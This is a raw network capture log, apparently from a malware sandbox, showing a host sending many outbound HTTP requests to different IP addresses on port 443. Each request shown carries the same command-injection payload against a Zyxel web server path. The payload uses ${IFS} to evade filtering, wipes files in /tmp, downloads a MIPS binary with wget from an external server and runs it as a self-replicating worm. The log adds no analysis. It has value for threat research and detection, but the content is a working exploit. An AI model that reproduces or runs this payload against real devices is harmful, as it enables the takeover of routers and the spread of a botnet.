                                        Jan 14, 2024 16:18:48.541615009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5277192.168.2.1349368109.248.223.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541652918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5278192.168.2.133919489.100.138.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541699886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5279192.168.2.1355342178.117.217.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541732073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5280192.168.2.135350819.49.118.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541800022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5281192.168.2.134901091.124.46.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541814089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5282192.168.2.1360828200.128.80.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541857958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5283192.168.2.1359666206.205.74.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541902065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5284192.168.2.1342466141.155.122.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541945934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5285192.168.2.1347800162.197.181.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541975021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5286192.168.2.133340417.73.119.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542022943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5287192.168.2.134154894.196.83.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542053938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5288192.168.2.1351218118.194.216.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542088985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5289192.168.2.13436065.132.82.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542144060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5290192.168.2.1336886107.10.46.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542180061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5291192.168.2.136067840.10.45.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542232037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5292192.168.2.133996263.175.99.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542279959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5293192.168.2.135564074.233.201.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542320013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5294192.168.2.134078262.206.198.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542346954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5295192.168.2.1347900154.74.150.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542397022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5296192.168.2.134583423.134.46.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542448044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5297192.168.2.1335086150.123.158.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542469978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5298192.168.2.1350850160.197.98.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542512894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5299192.168.2.134774683.174.23.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542531967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5300192.168.2.1344654115.238.76.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542576075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5301192.168.2.135214418.174.108.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542635918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5302192.168.2.1338200150.188.46.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542666912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5303192.168.2.133711012.18.148.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542699099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5304192.168.2.1359612196.186.172.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542735100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5305192.168.2.1357358191.249.226.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542789936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5306192.168.2.1335340195.13.154.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542819023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5307192.168.2.1360622210.187.143.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542828083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5308192.168.2.1355010190.27.231.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542889118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5309192.168.2.1355716151.33.124.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542913914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5310192.168.2.1339624118.181.49.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542954922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5311192.168.2.1349732137.67.118.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.542973995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5312192.168.2.1343324162.254.144.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543046951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5313192.168.2.134714070.37.36.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543076992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5314192.168.2.1334810218.16.136.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543107033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5315192.168.2.1333788182.186.31.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543139935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5316192.168.2.1337556185.240.93.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543188095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5317192.168.2.133494657.30.57.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543230057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5318192.168.2.1350746112.16.154.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543267965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5319192.168.2.1336540201.160.202.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543346882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5320192.168.2.134215290.17.146.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543356895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5321192.168.2.134018257.222.150.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543399096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5322192.168.2.134204032.9.86.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543451071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5323192.168.2.1350228152.7.194.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543489933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5324192.168.2.1359282129.53.142.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543514967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5325192.168.2.1356798138.211.250.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543562889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5326192.168.2.135282472.86.222.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543591976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5327192.168.2.1341498207.2.246.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543636084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5328192.168.2.135840680.157.160.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543668985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5329192.168.2.13594908.124.115.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543720961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5330192.168.2.1337984188.148.175.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543771982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5331192.168.2.1350902193.112.202.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543802023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5332192.168.2.133949698.160.226.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543826103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5333192.168.2.134707275.177.166.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543880939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5334192.168.2.1356534110.91.200.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543931007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5335192.168.2.133911474.142.208.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.543951035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5336192.168.2.1354748177.94.142.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544014931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5337192.168.2.135666020.37.40.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544050932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5338192.168.2.1360992126.23.238.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544102907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5339192.168.2.1345748121.116.219.1443
                                        TimestampBytes transferredDirectionData
